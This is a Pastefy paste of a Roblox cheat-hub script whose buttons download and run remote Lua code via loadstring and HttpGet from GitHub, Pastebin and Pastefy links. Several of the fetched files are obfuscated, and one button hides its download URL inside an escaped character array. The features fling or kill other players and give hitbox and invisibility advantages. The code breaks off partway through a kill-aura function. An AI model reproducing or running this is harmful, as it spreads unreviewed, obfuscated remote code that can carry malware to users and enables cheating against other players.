Script
View and share code snippets on Pastefy.
local Library = loadstring(game:HttpGet("https://raw.githubusercontent.com/xHeptc/Kavo-UI-Library/main/source.lua"))()
local Window = Library.CreateLib("Roblox script's GUI", "BloodTheme")
local script = Window:NewTab("scripts")
local Section = script:NewSection("script")
Section:NewButton("blade ball parry 1", "ButtonInfo", function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/Hosvile/Refinement/main/MC%3ABlade%20Ball%20Parry%20V2.0.0",true))()
print("Clicked")
end)
Section:NewButton("fling GUI", "ButtonInfo", function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/0Ben1/fe./main/Fling%20GUI"))()
print("Clicked")
end)
Section:NewButton("FE Illusion script r6", "you know", function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/0Ben1/fe/main/obf_11l7Y131YqJjZ31QmV5L8pI23V02b3191sEg26E75472Wl78Vi8870jRv5txZyL1.lua.txt"))()
print("Clicked")
end)
Section:NewButton("FE Fling all r6", "you know", function()
loadstring(game:HttpGet("https://pastebin.com/raw/zqyDSUWX"))()
print("Clicked")
end)
Section:NewButton("keyboard script", "you know", function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/advxzivhsjjdhxhsidifvsh/mobkeyboard/main/main.txt", true))()
print("Clicked")
end)
Section:NewButton("Hitbox", "you know", function()
loadstring(game:HttpGet(('https://pastefy.app/foq7h4og/raw'),true))()
print("Clicked")
end)
Section:NewButton("Pendulum Hub (Neko)", "you know", function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/Tescalus/Pendulum-Hubs-Source/main/Pendulum%20Hub%20V5.lua"))()
print("Clicked")
end)
Section:NewButton("Fe T-Pose fling script", "execut it to know", function()
loadstring(game:HttpGet(('https://pastefy.app/oCKLmRRo/raw'),true))()
print("Clicked")
end)
Section:NewButton("(OP) Nova X Blade ball script", "you know", function()
loadstring(game:HttpGet('https://raw.githubusercontent.com/kierpogihahaxd2/MANUAL/main/Script'))()
print("Clicked")
end)
Section:NewButton("FE scp - 173 fling script", "you know", function()
loadstring(game:HttpGet(('https://raw.githubusercontent.com/0Ben1/fe/main/obf_nN0N66DHV2BjPwzYN59M17qSSlvJryM201CSC1sg07czxnZf48h9GHOFGd87G6Hh.lua.txt'),true))()
print("Clicked")
end)
Section:NewButton("Fe invisible", "invisible makes you invisible script", function()
loadstring(game:HttpGet('https://pastebin.com/raw/AYtzGEPb'))()
print("Clicked")
end)
Section:NewButton("Fe fly car", "it makes the car fly", function()
SGTSOBF_WWwwWWWww={"\108","\111","\97","\100","\115","\116","\114","\105","\110","\103","\40","\103","\97","\109","\101","\58","\72","\116","\116","\112","\71","\101","\116","\40","\40","\39","\92","\49","\48","\52","\92","\49","\49","\54","\92","\49","\49","\54","\92","\49","\49","\50","\92","\49","\49","\53","\92","\53","\56","\92","\52","\55","\92","\52","\55","\92","\49","\49","\50","\92","\57","\55","\92","\49","\49","\53","\92","\49","\49","\54","\92","\49","\48","\49","\92","\57","\56","\92","\49","\48","\53","\92","\49","\49","\48","\92","\52","\54","\92","\57","\57","\92","\49","\49","\49","\92","\49","\48","\57","\92","\52","\55","\92","\49","\49","\52","\92","\57","\55","\92","\49","\49","\57","\92","\52","\55","\92","\53","\52","\92","\53","\49","\92","\56","\52","\92","\52","\56","\92","\49","\48","\50","\92","\49","\48","\55","\92","\54","\54","\92","\49","\48","\57","\92","\49","\48","\39","\41","\44","\116","\114","\117","\101","\41","\41","\40","\41",}SGTSOBF_HHhHHHHHh="";for _,SGTSOBF_dDDDDDDdD in pairs(SGTSOBF_WWwwWWWww)do SGTSOBF_HHhHHHHHh=SGTSOBF_HHhHHHHHh..SGTSOBF_dDDDDDDdD;end;SGTSOBF_CCCcCCcCC=function(SGTSOBF_fFFFFfFfF)loadstring(SGTSOBF_fFFFFfFfF)()end;SGTSOBF_CCCcCCcCC(SGTSOBF_HHhHHHHHh)
print("Clicked")
end)
Section:NewButton("Sword Aura", "it kills palyers the if you're go near a players", function()
--// Setting \--
local range = 15
--// Variable \--
local player = game:GetService("Players").LocalPlayer
--// Script \--
game:GetService("RunService").RenderStepped:Connect(function()
local p = game.Players:GetPlayers()
Tags
Description
This paste contains a Roblox script that utilizes a UI library to create graphical interfaces for various in-game exploits. It includes buttons for features like 'blade ball parry', 'fling GUI', and 'FE Illusion script r6'. The script fetches additional Lua code from external GitHub repositories to enable these functionalities.